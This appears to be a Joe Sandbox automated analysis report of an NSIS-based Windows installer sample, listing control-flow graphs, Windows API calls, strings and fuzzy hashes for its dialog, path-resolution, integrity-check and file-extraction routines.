                                                                                                                                                                                              control_flow_graph 188 403d58-403d6a 189 403d70-403d76 188->189 190 403eab-403eba 188->190 189->190 191 403d7c-403d85 189->191 192 403f09-403f1e 190->192 193 403ebc-403f04 GetDlgItem * 2 call 404231 SetClassLongW call 40140b 190->193 196 403d87-403d94 SetWindowPos 191->196 197 403d9a-403d9d 191->197 194 403f20-403f23 192->194 195 403f5e-403f63 call 40427d 192->195 193->192 199 403f25-403f30 call 401389 194->199 200 403f56-403f58 194->200 207 403f68-403f83 195->207 196->197 202 403db7-403dbd 197->202 203 403d9f-403db1 ShowWindow 197->203 199->200 221 403f32-403f51 SendMessageW 199->221 200->195 206 4041fe 200->206 208 403dd9-403ddc 202->208 209 403dbf-403dd4 DestroyWindow 202->209 203->202 214 404200-404207 206->214 212 403f85-403f87 call 40140b 207->212 213 403f8c-403f92 207->213 217 403dde-403dea SetWindowLongW 208->217 218 403def-403df5 208->218 215 4041db-4041e1 209->215 212->213 224 403f98-403fa3 213->224 225 4041bc-4041d5 DestroyWindow EndDialog 213->225 215->206 223 4041e3-4041e9 215->223 217->214 219 403e98-403ea6 call 404298 218->219 220 403dfb-403e0c GetDlgItem 218->220 219->214 226 403e2b-403e2e 220->226 227 403e0e-403e25 SendMessageW IsWindowEnabled 220->227 221->214 223->206 229 4041eb-4041f4 ShowWindow 223->229 224->225 230 403fa9-403ff6 call 4062dc call 404231 * 3 GetDlgItem 224->230 225->215 231 403e30-403e31 226->231 232 403e33-403e36 226->232 227->206 227->226 229->206 258 404000-40403c ShowWindow KiUserCallbackDispatcher call 404253 EnableWindow 230->258 259 403ff8-403ffd 230->259 235 403e61-403e66 call 40420a 231->235 236 403e44-403e49 232->236 237 403e38-403e3e 232->237 235->219 241 403e7f-403e92 SendMessageW 236->241 242 403e4b-403e51 236->242 240 403e40-403e42 237->240 237->241 240->235 241->219 246 403e53-403e59 call 40140b 242->246 247 403e68-403e71 call 40140b 242->247 256 403e5f 246->256 247->219 255 403e73-403e7d 247->255 255->256 256->235 262 404041 258->262 263 40403e-40403f 258->263 259->258 264 404043-404071 GetSystemMenu EnableMenuItem SendMessageW 262->264 263->264 265 404073-404084 SendMessageW 264->265 266 404086 264->266 267 40408c-4040cb call 404266 call 403d39 call 4062ba lstrlenW call 4062dc SetWindowTextW call 401389 265->267 266->267 267->207 278 4040d1-4040d3 267->278 278->207 279 4040d9-4040dd 278->279 280 4040fc-404110 DestroyWindow 279->280 281 4040df-4040e5 279->281 280->215 282 404116-404143 CreateDialogParamW 280->282 281->206 283 4040eb-4040f1 281->283 282->215 284 404149-4041a0 call 404231 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 282->284 283->207 285 4040f7 283->285 284->206 290 4041a2-4041b5 ShowWindow call 40427d 284->290 285->206 292 4041ba 290->292 292->215
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403DB1
                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00403DC5
                                                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403E02
                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404007
                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404034
                                                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00404051
                                                                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                                                                                                                                                              • lstrlenW.KERNEL32(00450248,?,00450248,00000000), ref: 004040A6
                                                                                                                                                                                              • SetWindowTextW.USER32(?,00450248), ref: 004040BA
                                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3282139019-0
                                                                                                                                                                                              • Opcode ID: fc0f4d7be1e4c82c86fade982caad82dc734dafc7249948e3003efd3e17736fb
                                                                                                                                                                                              • Instruction ID: ebd8885eb79f40fe398f9982bcc50e4b60f6275a3dc5f5776bcae5bce4ead0d0
                                                                                                                                                                                              • Opcode Fuzzy Hash: fc0f4d7be1e4c82c86fade982caad82dc734dafc7249948e3003efd3e17736fb
                                                                                                                                                                                              • Instruction Fuzzy Hash: AFC1D5B1500304ABDB206F61EE88E2B3A78FB95346F00053EF645B51F1CB799891DB6E
                                                                                                                                                                                              Function 004039AA Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 293 4039aa-4039c2 call 406694 296 4039c4-4039d4 call 406201 293->296 297 4039d6-403a0d call 406188 293->297 306 403a30-403a59 call 403c80 call 405c97 296->306 302 403a25-403a2b lstrcatW 297->302 303 403a0f-403a20 call 406188 297->303 302->306 303->302 311 403aeb-403af3 call 405c97 306->311 312 403a5f-403a64 306->312 318 403b01-403b26 LoadImageW 311->318 319 403af5-403afc call 4062dc 311->319 312->311 313 403a6a-403a92 call 406188 312->313 313->311 320 403a94-403a98 313->320 322 403ba7-403baf call 40140b 318->322 323 403b28-403b58 RegisterClassW 318->323 319->318 324 403aaa-403ab6 lstrlenW 320->324 325 403a9a-403aa7 call 405bbc 320->325 336 403bb1-403bb4 322->336 337 403bb9-403bc4 call 403c80 322->337 326 403c76 323->326 327 403b5e-403ba2 SystemParametersInfoW CreateWindowExW 323->327 331 403ab8-403ac6 lstrcmpiW 324->331 332 403ade-403ae6 call 405b8f call 4062ba 324->332 325->324 330 403c78-403c7f 326->330 327->322 331->332 335 403ac8-403ad2 GetFileAttributesW 331->335 332->311 339 403ad4-403ad6 335->339 340 403ad8-403ad9 call 405bdb 335->340 336->330 346 403bca-403be4 ShowWindow call 406624 337->346 347 403c4d-403c4e call 4053f5 337->347 339->332 339->340 340->332 352 403bf0-403c02 GetClassInfoW 346->352 353 403be6-403beb call 406624 346->353 351 403c53-403c55 347->351 354 403c57-403c5d 351->354 355 403c6f-403c71 call 40140b 351->355 359 403c04-403c14 GetClassInfoW RegisterClassW 352->359 360 403c1a-403c3d DialogBoxParamW call 40140b 352->360 353->352 354->336 356 403c63-403c6a call 40140b 354->356 355->326 356->336 359->360 364 403c42-403c4b call 4038fa 360->364 364->330
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                              • lstrcatW.KERNEL32(004DB000,00450248,80000001,Control Panel\Desktop\ResourceLocale,00000000,00450248,00000000,00000002,004DF000,74DF3420,004CB000,00000000), ref: 00403A2B
                                                                                                                                                                                              • lstrlenW.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,004CF000,004DB000,00450248,80000001,Control Panel\Desktop\ResourceLocale,00000000,00450248,00000000,00000002,004DF000), ref: 00403AAB
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,004CF000,004DB000,00450248,80000001,Control Panel\Desktop\ResourceLocale,00000000,00450248,00000000), ref: 00403ABE
                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(Remove folder: ), ref: 00403AC9
                                                                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004CF000), ref: 00403B12
                                                                                                                                                                                                • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                              • RegisterClassW.USER32(00472E80), ref: 00403B4F
                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                                                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00472E80), ref: 00403BFE
                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00472E80), ref: 00403C0B
                                                                                                                                                                                              • RegisterClassW.USER32(00472E80), ref: 00403C14
                                                                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                              • API String ID: 1975747703-564491471
                                                                                                                                                                                              • Opcode ID: f1b2be5f89fac0cbf9958f47fdf3d8daba4c0bfed37b59ff3d0d792caf125e20
                                                                                                                                                                                              • Instruction ID: e946f9b6b947081a315c1f95bc525aa973ad4f651662e5f5477bf26fdb3bf1de
                                                                                                                                                                                              • Opcode Fuzzy Hash: f1b2be5f89fac0cbf9958f47fdf3d8daba4c0bfed37b59ff3d0d792caf125e20
                                                                                                                                                                                              • Instruction Fuzzy Hash: B361C8302407007ED720AF669E45E2B3A6CEB8474AF40417FF985B51E2DBBD5951CB2E
                                                                                                                                                                                              Function 004062DC Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 367 4062dc-4062e7 368 4062e9-4062f8 367->368 369 4062fa-406310 367->369 368->369 370 406316-406323 369->370 371 406528-40652e 369->371 370->371 374 406329-406330 370->374 372 406534-40653f 371->372 373 406335-406342 371->373 376 406541-406545 call 4062ba 372->376 377 40654a-40654b 372->377 373->372 375 406348-406354 373->375 374->371 378 406515 375->378 379 40635a-406398 375->379 376->377 383 406523-406526 378->383 384 406517-406521 378->384 381 4064b8-4064bc 379->381 382 40639e-4063a9 379->382 387 4064be-4064c4 381->387 388 4064ef-4064f3 381->388 385 4063c2 382->385 386 4063ab-4063b0 382->386 383->371 384->371 392 4063c9-4063d0 385->392 386->385 389 4063b2-4063b5 386->389 390 4064d4-4064e0 call 4062ba 387->390 391 4064c6-4064d2 call 406201 387->391 393 406502-406513 lstrlenW 388->393 394 4064f5-4064fd call 4062dc 388->394 389->385 396 4063b7-4063ba 389->396 405 4064e5-4064eb 390->405 391->405 398 4063d2-4063d4 392->398 399 4063d5-4063d7 392->399 393->371 394->393 396->385 401 4063bc-4063c0 396->401 398->399 403 406412-406415 399->403 404 4063d9-406400 call 406188 399->404 401->392 406 406425-406428 403->406 407 406417-406423 GetSystemDirectoryW 403->407 417 4064a0-4064a3 404->417 418 406406-40640d call 4062dc 404->418 405->393 409 4064ed 405->409 411 406493-406495 406->411 412 40642a-406438 GetWindowsDirectoryW 406->412 410 406497-40649b 407->410 414 4064b0-4064b6 call 40654e 409->414 410->414 419 40649d 410->419 411->410 416 40643a-406444 411->416 412->411 414->393 422 406446-406449 416->422 423 40645e-406474 SHGetSpecialFolderLocation 416->423 417->414 420 4064a5-4064ab lstrcatW 417->420 418->410 419->417 420->414 422->423 426 40644b-406452 422->426 427 406476-40648d SHGetPathFromIDListW CoTaskMemFree 423->427 428 40648f 423->428 429 40645a-40645c 426->429 427->410 427->428 428->411 429->410 429->423
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(Remove folder: ,00002000), ref: 0040641D
                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00002000,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,?,00405359,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000), ref: 00406430
                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405359,0042F8B9,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,?,00405359,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000), ref: 0040646C
                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(0042F8B9,Remove folder: ), ref: 0040647A
                                                                                                                                                                                              • CoTaskMemFree.OLE32(0042F8B9), ref: 00406485
                                                                                                                                                                                              • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                                                                                                                                                              • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,?,00405359,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000), ref: 00406503
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                              • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                              • API String ID: 717251189-3325303262
                                                                                                                                                                                              • Opcode ID: 412c271bb9d070f278564469311d6f605cf1b48e62db3e13451b1dc2679c3c4f
                                                                                                                                                                                              • Instruction ID: deb4280fb9253f119c0dee44fead77f8699473dbe43bed35a1e393a154a8df3c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 412c271bb9d070f278564469311d6f605cf1b48e62db3e13451b1dc2679c3c4f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 87612371A00115AADF209F64DC44BAE37A5EF45318F22803FE907B62D0D77D9AA1C75E
                                                                                                                                                                                              Function 00402EDD Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 430 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 433 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 430->433 434 402f2d-402f32 430->434 442 403052-403060 call 402e79 433->442 443 402f6b 433->443 435 40310f-403113 434->435 449 403062-403065 442->449 450 4030b5-4030ba 442->450 445 402f70-402f87 443->445 447 402f89 445->447 448 402f8b-402f94 call 403331 445->448 447->448 456 402f9a-402fa1 448->456 457 4030bc-4030c4 call 402e79 448->457 452 403067-40307f call 403347 call 403331 449->452 453 403089-4030b3 GlobalAlloc call 403347 call 403116 449->453 450->435 452->450 478 403081-403087 452->478 453->450 476 4030c6-4030d7 453->476 461 402fa3-402fb7 call 405d6b 456->461 462 40301d-403021 456->462 457->450 467 40302b-403031 461->467 481 402fb9-402fc0 461->481 466 403023-40302a call 402e79 462->466 462->467 466->467 473 403040-40304a 467->473 474 403033-40303d call 406787 467->474 473->445 477 403050 473->477 474->473 483 4030d9 476->483 484 4030df-4030e4 476->484 477->442 478->450 478->453 481->467 482 402fc2-402fc9 481->482 482->467 486 402fcb-402fd2 482->486 483->484 487 4030e5-4030eb 484->487 486->467 488 402fd4-402fdb 486->488 487->487 489 4030ed-403108 SetFilePointer call 405d6b 487->489 488->467 490 402fdd-402ffd 488->490 493 40310d 489->493 490->450 492 403003-403007 490->492 494 403009-40300d 492->494 495 40300f-403017 492->495 493->435 494->477 494->495 495->467 496 403019-40301b 495->496 496->467
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004E7000,00002000,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                                                                                • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(004E7000,00402F1D,004E7000,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004EB000,00000000,004D7000,004D7000,004E7000,004E7000,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                                                                                              • soft, xrefs: 00402FCB
                                                                                                                                                                                              • Error launching installer, xrefs: 00402F2D
                                                                                                                                                                                              • Null, xrefs: 00402FD4
                                                                                                                                                                                              • Inst, xrefs: 00402FC2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                              • API String ID: 4283519449-527102705
                                                                                                                                                                                              • Opcode ID: b6f6648de98c24fa7c04dbba87c1fded15afc009f9c9acd1abae5bab2567aa71
                                                                                                                                                                                              • Instruction ID: d807cc789e5c0b6659aec278a7977cb1897ccc82e3fedab9e592eb30a9b28e48
                                                                                                                                                                                              • Opcode Fuzzy Hash: b6f6648de98c24fa7c04dbba87c1fded15afc009f9c9acd1abae5bab2567aa71
                                                                                                                                                                                              • Instruction Fuzzy Hash: 23511671901205ABDB20AF61DD85B9F7FACEB0431AF20403BF914B62D5C7789E818B9D
                                                                                                                                                                                              Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 561 40176f-401794 call 402c41 call 405c06 566 401796-40179c call 4062ba 561->566 567 40179e-4017b0 call 4062ba call 405b8f lstrcatW 561->567 572 4017b5-4017b6 call 40654e 566->572 567->572 576 4017bb-4017bf 572->576 577 4017c1-4017cb call 4065fd 576->577 578 4017f2-4017f5 576->578 586 4017dd-4017ef 577->586 587 4017cd-4017db CompareFileTime 577->587 580 4017f7-4017f8 call 405d8b 578->580 581 4017fd-401819 call 405db0 578->581 580->581 588 40181b-40181e 581->588 589 40188d-4018b6 call 405322 call 403116 581->589 586->578 587->586 590 401820-40185e call 4062ba * 2 call 4062dc call 4062ba call 405920 588->590 591 40186f-401879 call 405322 588->591 603 4018b8-4018bc 589->603 604 4018be-4018ca SetFileTime 589->604 590->576 623 401864-401865 590->623 601 401882-401888 591->601 605 402ace 601->605 603->604 607 4018d0-4018db CloseHandle 603->607 604->607 611 402ad0-402ad4 605->611 608 4018e1-4018e4 607->608 609 402ac5-402ac8 607->609 612 4018e6-4018f7 call 4062dc lstrcatW 608->612 613 4018f9-4018fc call 4062dc 608->613 609->605 619 401901-4022fc call 405920 612->619 613->619 619->609 619->611 623->601 625 401867-401868 623->625 625->591
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,ExecShellAsUser,004D3000,?,?,00000031), ref: 004017B0
                                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,ExecShellAsUser,ExecShellAsUser,00000000,00000000,ExecShellAsUser,004D3000,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00002000,00403460,00472EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                • Part of subcall function 00405322: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,0040327A,0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0), ref: 0040537D
                                                                                                                                                                                                • Part of subcall function 00405322: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\), ref: 0040538F
                                                                                                                                                                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
